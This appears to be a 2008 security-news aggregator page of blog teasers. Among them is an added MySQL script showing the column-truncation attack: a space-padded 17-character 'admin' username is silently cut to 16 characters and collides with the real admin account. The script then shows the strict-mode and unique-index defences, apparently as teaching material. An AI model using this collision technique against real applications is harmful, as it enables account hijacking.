Stefan Esser has a really good article about how MySQL and SQL truncate columns which can lead to security holes. He uses a good example of a column that has a width of 16 chars but he submits something with 17 chars. Obviously enforcing length is one way to enforce that, even if it almost never happens. But one other thing came to mind.
Harkening back to my days of reading Rain Forrest Puppy’s papers, I realized that oftentimes the code does a straight regex or string matchi >>
ha.ckers
08-18-2008 5:02
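The 16-versus-17-character case from the post, played out against a MySQL server, as an added example that is not from the ha.ckers post or from Esser's article. It assumes MySQL 5.x with a PAD SPACE collation (latin1_swedish_ci, the default of that era) and a non-strict sql_mode; the table name, column widths, the `@attacker_name` variable and the 11-space padding are choices made for the illustration.

```sql
-- Added example, not code from the ha.ckers post or Esser's article.
-- Assumes MySQL 5.x, a PAD SPACE collation and a non-strict sql_mode;
-- table and column names are invented for the illustration.
SET SESSION sql_mode = '';          -- non-strict: over-length values are cut, not rejected

CREATE TABLE users (
    id            INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
    username      VARCHAR(16)  NOT NULL,
    password_hash CHAR(64)     NOT NULL
) ENGINE=InnoDB CHARACTER SET latin1 COLLATE latin1_swedish_ci;

-- The legitimate account.
INSERT INTO users (username, password_hash) VALUES ('admin', REPEAT('a', 64));

-- The attacker registers 'admin' + 11 spaces + 'x': 17 characters, one more than the column.
SET @attacker_name = CONCAT('admin', REPEAT(' ', 11), 'x');

-- The application's "is this name taken?" check compares the full 17-character
-- value as-is; it equals no stored username, so the application proceeds.
SELECT COUNT(*) AS taken FROM users WHERE username = @attacker_name;

-- Non-strict mode stores only the first 16 characters, 'admin' + 11 spaces, and
-- raises warning 1265 (Data truncated); the application never sees a failure.
INSERT INTO users (username, password_hash) VALUES (@attacker_name, REPEAT('b', 64));
SHOW WARNINGS;

-- PAD SPACE collations treat trailing spaces as insignificant in comparisons, so
-- the login lookup for 'admin' now matches both rows; which one the application
-- uses depends on its code, not on the database.
SELECT id, username, password_hash FROM users WHERE username = 'admin';

-- Defence 1: strict mode turns truncation into error 1406 (Data too long) and the
-- over-length INSERT is rejected instead of silently shortened.
SET SESSION sql_mode = 'STRICT_ALL_TABLES';
INSERT INTO users (username, password_hash)
    VALUES (CONCAT('root', REPEAT(' ', 12), 'x'), REPEAT('c', 64));

-- Defence 2: a unique index uses the same collation, so the truncated
-- 'admin' + spaces and 'admin' are the same key. Remove the attacker's row,
-- add the index, and the same INSERT now fails with error 1062 (Duplicate entry)
-- even on a server left in non-strict mode.
DELETE FROM users WHERE password_hash = REPEAT('b', 64);
ALTER TABLE users ADD UNIQUE KEY uk_username (username);
SET SESSION sql_mode = '';
INSERT INTO users (username, password_hash) VALUES (@attacker_name, REPEAT('b', 64));
```

Two of the statements are meant to error, so run the script with `mysql --force` or paste it interactively. Neither database-side defence replaces the length check the post recommends in the application: the uniqueness check above passed precisely because the application compared a value the database was never going to store. Note also that MySQL 8.0's default collation, utf8mb4_0900_ai_ci, is NO PAD, so the trailing-space collision does not occur there, while silent truncation still does wherever strict mode is switched off.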
Better Risk Management for Banking Industry
With the recent identity theft cases in the banking industry, a new regulation is being implemented to counter identity theft. Effective November 1, 2008, all federally regulated banks, credit card companies and other financial institutions will be required to be in full compliance with the Identity Theft Red Flags Rule, which is designed to help financial services firms protect consumers' identities. The goal of the rules is to "flag" attempted and actual identit >>
hackathology
Good news! Matt Miller, author of plenty of cutting-edge security research, including my fave “A Brief History of Exploitation Techniques and Mitigations on Windows” has joined the Security Science team to work on improved ways to find security vulnerabilities and better software defenses through mitigations. Most recently, Matt’s been focused on design review for Windows 7.
Matt brings a massive amount of real-world exploit and defense experience to our team. Learn more ab >>
Microsoft
08-14-2008 22:20
Security is bigger than finding and fixing bugs
I just wrapped up a post over on the SDL blog with some comments about an article on Google's security work.
>>
Filed under: Security, Mac 101
Security researchers at Corsaire have published a PDF whitepaper discussing best practices for securing Mac OS X 10.5 Leopard in a networked environment. The whitepaper is free.
"While the default installation provides a relatively secure system, it may not always meet organizational security requirements. This guide is aimed at users in environments requiring stronger security controls in their operating system, making full use of the protection fe >>
tuaw
08-13-2008 22:00
Rohos Logon Key: Turn any USB device into a login key
Filed under: Software, Security
In my last post, I mentioned that security bugs were different from other bugs. Daniel Prochnow asked:
What is the difference between a bug and a vulnerability?
In my point of view, in a production environment, every bug that may lead to a loss event (CID, image, $) must be considered a security incident.
What do you think?
I answered in the comments, but I think the answer deserves a bit more commentary, especially when Evan asked:
>>
Microsoft
08-16-2008 19:58
HTML 5.0
On good authority I was told to take a good hard look at the newly proposed HTML 5.0 spec that’s floating around the WHATWG. Firstly my eyes went to the new video and audio tags which are meant to help users deal with the apparently confusing nature of the fact that we have img tags instead of just using embed for everything. Personally I think that’s just a horrible idea that’s going to break a lot of blacklists out there and potentially open more security holes depending if the scri >>
ha.ckers